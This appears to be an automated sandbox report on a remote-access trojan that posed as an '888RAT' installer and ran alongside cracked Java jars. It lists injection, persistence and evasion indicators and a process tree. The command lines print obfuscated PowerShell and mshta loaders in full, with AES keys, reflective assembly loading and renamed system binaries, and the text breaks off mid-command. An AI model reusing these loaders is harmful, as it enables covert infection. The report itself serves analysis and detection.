N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe N/A
N/A N/A C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3748 wrote to memory of 4220 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3748 wrote to memory of 4220 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3748 wrote to memory of 3308 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3748 wrote to memory of 3308 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3748 wrote to memory of 3308 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3748 wrote to memory of 3308 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3748 wrote to memory of 3308 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3748 wrote to memory of 3308 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3748 wrote to memory of 3308 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3748 wrote to memory of 3308 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3748 wrote to memory of 3308 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3748 wrote to memory of 3308 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3748 wrote to memory of 3308 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3748 wrote to memory of 3308 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3748 wrote to memory of 3308 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3748 wrote to memory of 3308 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3748 wrote to memory of 3308 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3748 wrote to memory of 3308 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3748 wrote to memory of 3308 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3748 wrote to memory of 3308 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3748 wrote to memory of 3308 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3748 wrote to memory of 3308 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3748 wrote to memory of 3308 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3748 wrote to memory of 3308 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3748 wrote to memory of 3308 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3748 wrote to memory of 3308 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3748 wrote to memory of 3308 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3748 wrote to memory of 3308 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3748 wrote to memory of 3308 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3748 wrote to memory of 3308 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3748 wrote to memory of 3308 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3748 wrote to memory of 3308 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3748 wrote to memory of 3308 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3748 wrote to memory of 3308 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3748 wrote to memory of 3308 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3748 wrote to memory of 3308 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3748 wrote to memory of 3308 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3748 wrote to memory of 3308 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3748 wrote to memory of 3308 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3748 wrote to memory of 3308 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3748 wrote to memory of 424 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3748 wrote to memory of 424 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3748 wrote to memory of 3092 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3748 wrote to memory of 3092 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3748 wrote to memory of 3092 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3748 wrote to memory of 3092 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3748 wrote to memory of 3092 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3748 wrote to memory of 3092 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3748 wrote to memory of 3092 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3748 wrote to memory of 3092 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3748 wrote to memory of 3092 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3748 wrote to memory of 3092 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3748 wrote to memory of 3092 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3748 wrote to memory of 3092 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3748 wrote to memory of 3092 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3748 wrote to memory of 3092 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3748 wrote to memory of 3092 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3748 wrote to memory of 3092 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3748 wrote to memory of 3092 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3748 wrote to memory of 3092 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3748 wrote to memory of 3092 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3748 wrote to memory of 3092 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3748 wrote to memory of 3092 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3748 wrote to memory of 3092 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://google.com

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ff961339758,0x7ff961339768,0x7ff961339778

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1772 --field-trial-handle=1852,i,6350202070883517753,13609223601977129310,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1612 --field-trial-handle=1852,i,6350202070883517753,13609223601977129310,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2104 --field-trial-handle=1852,i,6350202070883517753,13609223601977129310,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2988 --field-trial-handle=1852,i,6350202070883517753,13609223601977129310,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2996 --field-trial-handle=1852,i,6350202070883517753,13609223601977129310,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4332 --field-trial-handle=1852,i,6350202070883517753,13609223601977129310,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3712 --field-trial-handle=1852,i,6350202070883517753,13609223601977129310,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4748 --field-trial-handle=1852,i,6350202070883517753,13609223601977129310,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=3756 --field-trial-handle=1852,i,6350202070883517753,13609223601977129310,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4812 --field-trial-handle=1852,i,6350202070883517753,13609223601977129310,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=4748 --field-trial-handle=1852,i,6350202070883517753,13609223601977129310,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5380 --field-trial-handle=1852,i,6350202070883517753,13609223601977129310,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5888 --field-trial-handle=1852,i,6350202070883517753,13609223601977129310,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5940 --field-trial-handle=1852,i,6350202070883517753,13609223601977129310,131072 /prefetch:8

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\" -an -ai#7zMap18788:92:7zEvent4774

C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe

"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar "C:\Users\Admin\Desktop\FutureCracked.jar"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5020 --field-trial-handle=1852,i,6350202070883517753,13609223601977129310,131072 /prefetch:2

C:\Windows\system32\werfault.exe

werfault.exe /h /shared Global\03bbf9cb65724dbfa51d76f0b2aee11e /t 5036 /p 4880

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe

"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar "C:\Users\Admin\Desktop\SnowV4Cracked.jar"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=3120 --field-trial-handle=1852,i,6350202070883517753,13609223601977129310,131072 /prefetch:1

C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe

"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar "C:\Users\Admin\Desktop\PhobosCrackedCLEAN.jar"

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5936 --field-trial-handle=1852,i,6350202070883517753,13609223601977129310,131072 /prefetch:8

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\" -an -ai#7zMap14911:96:7zEvent6696

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\888RAT\888rat-install.bat" "

C:\Users\Admin\Desktop\888RAT\888rat-install.bat.exe

"888rat-install.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function agDFc($vCpVI){ $Qviqn=[System.Security.Cryptography.Aes]::Create(); $Qviqn.Mode=[System.Security.Cryptography.CipherMode]::CBC; $Qviqn.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $Qviqn.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('eSyKXuxugFflvGlW9qE6Iqg8XcAom2v4/DjQoKKC570='); $Qviqn.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9iro50udEDaxZ/wkUff9RA=='); $FmMlx=$Qviqn.CreateDecryptor(); $return_var=$FmMlx.TransformFinalBlock($vCpVI, 0, $vCpVI.Length); $FmMlx.Dispose(); $Qviqn.Dispose(); $return_var;}function cZEYh($vCpVI){ $WLTiH=New-Object System.IO.MemoryStream(,$vCpVI); $KNxYU=New-Object System.IO.MemoryStream; $LOvEr=New-Object System.IO.Compression.GZipStream($WLTiH, [IO.Compression.CompressionMode]::Decompress); $LOvEr.CopyTo($KNxYU); $LOvEr.Dispose(); $WLTiH.Dispose(); $KNxYU.Dispose(); $KNxYU.ToArray();}function fELFD($vCpVI,$TXpag){ $fzHaG=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$vCpVI); $UtByz=$fzHaG.EntryPoint; $UtByz.Invoke($null, $TXpag);}$QLGin=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\Desktop\888RAT\888rat-install.bat').Split([Environment]::NewLine);foreach ($AkEcQ in $QLGin) { if ($AkEcQ.StartsWith('SEROXEN')) { $fJBxd=$AkEcQ.Substring(7); break; }}$CjuJm=[string[]]$fJBxd.Split('\');$hxBpb=cZEYh (agDFc ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($CjuJm[0])));$OyvxC=cZEYh (agDFc ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($CjuJm[1])));fELFD $OyvxC (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));fELFD $hxBpb (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));

C:\Windows\System32\NOTEPAD.EXE

"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Desktop\888RAT\888rat-install.bat

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Desktop\888RAT\888rat-install.bat"

C:\Users\Admin\Desktop\888RAT\888rat-install.bat.exe

"C:\Users\Admin\Desktop\888RAT\888rat-install.bat.exe"

C:\Users\Admin\Desktop\888RAT\888rat-install.bat.exe

"888rat-install.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function agDFc($vCpVI){ $Qviqn=[System.Security.Cryptography.Aes]::Create(); $Qviqn.Mode=[System.Security.Cryptography.CipherMode]::CBC; $Qviqn.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $Qviqn.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('eSyKXuxugFflvGlW9qE6Iqg8XcAom2v4/DjQoKKC570='); $Qviqn.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9iro50udEDaxZ/wkUff9RA=='); $FmMlx=$Qviqn.CreateDecryptor(); $return_var=$FmMlx.TransformFinalBlock($vCpVI, 0, $vCpVI.Length); $FmMlx.Dispose(); $Qviqn.Dispose(); $return_var;}function cZEYh($vCpVI){ $WLTiH=New-Object System.IO.MemoryStream(,$vCpVI); $KNxYU=New-Object System.IO.MemoryStream; $LOvEr=New-Object System.IO.Compression.GZipStream($WLTiH, [IO.Compression.CompressionMode]::Decompress); $LOvEr.CopyTo($KNxYU); $LOvEr.Dispose(); $WLTiH.Dispose(); $KNxYU.Dispose(); $KNxYU.ToArray();}function fELFD($vCpVI,$TXpag){ $fzHaG=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$vCpVI); $UtByz=$fzHaG.EntryPoint; $UtByz.Invoke($null, $TXpag);}$QLGin=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\Desktop\888RAT\888rat-install.bat').Split([Environment]::NewLine);foreach ($AkEcQ in $QLGin) { if ($AkEcQ.StartsWith('SEROXEN')) { $fJBxd=$AkEcQ.Substring(7); break; }}$CjuJm=[string[]]$fJBxd.Split('\');$hxBpb=cZEYh (agDFc ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($CjuJm[0])));$OyvxC=cZEYh (agDFc ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($CjuJm[1])));fELFD $OyvxC (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));fELFD $hxBpb (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{d1e563b0-7106-4c13-b3d5-c92b1bec6713}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{43aa39a3-1ed8-427f-b4c7-cd139687cd03}

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Desktop\888RAT\888rat-install.bat"

C:\Windows\$sxr-mshta.exe

C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-jUsBURfHSoufmNeEAjpO4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"

C:\Windows\$sxr-cmd.exe

"C:\Windows\$sxr-cmd.exe" /c %$sxr-jUsBURfHSoufmNeEAjpO4312:&#<?=%

C:\Windows\$sxr-powershell.exe

C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function hufeg($iDMxb){ $Elzpw=[System.Security.Cryptography.Aes]::Create(); $Elzpw.Mode=[System.Security.Cryptography.CipherMode]::CBC; $Elzpw.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $Elzpw.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ScFxiXv+iEo0UMCuEp0Dj6ldTafwKIFrpQdT06sepfk='); $Elzpw.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x90xMD7ECTiuD6SgY+FhCA=='); $wCTZr=$Elzpw.('rotpyrceDetaerC'[-1..-15] -join '')(); $YgtPo=$wCTZr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iDMxb, 0, $iDMxb.Length); $wCTZr.Dispose(); $Elzpw.Dispose(); $YgtPo;}function FJcTY($iDMxb){ $KHdof=New-Object System.IO.MemoryStream(,$iDMxb); $mdDGq=New-Object System.IO.MemoryStream; $PZsap=New-Object System.IO.Compression.GZipStream($KHdof, [IO.Compression.CompressionMode]::Decompress); $PZsap.CopyTo($mdDGq); $PZsap.Dispose(); $KHdof.Dispose(); $mdDGq.Dispose(); $mdDGq.ToArray();}function vUmWc($iDMxb,$PbTpW){ $YHPse=[System.Reflection.Assembly]::Load([byte[]]$iDMxb); $aMqIy=$YHPse.EntryPoint; $aMqIy.Invoke($null, $PbTpW);}$Elzpw1 = New-Object System.Security.Cryptography.AesManaged;$Elzpw1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$Elzpw1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$Elzpw1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ScFxiXv+iEo0UMCuEp0Dj6ldTafwKIFrpQdT06sepfk=');$Elzpw1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x90xMD7ECTiuD6SgY+FhCA==');$lkChZ = $Elzpw1.('rotpyrceDetaerC'[-1..-15] -join '')();$kveij = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('skxuT638mXYXO82tnMu4Nw==');$kveij = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij, 0, $kveij.Length);$kveij = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij);$uYwHJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7tPhtRoBPpmbD4jKqCrROmZ5ihpYMWVokvpj2Ng/Pz8=');$uYwHJ = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uYwHJ, 0, $uYwHJ.Length);$uYwHJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uYwHJ);$XPhKE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MN4dM3v9612JtLqaveCMYg==');$XPhKE = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XPhKE, 0, $XPhKE.Length);$XPhKE = [System.Text.Encoding]::('8FTU'[-1..-4] -join 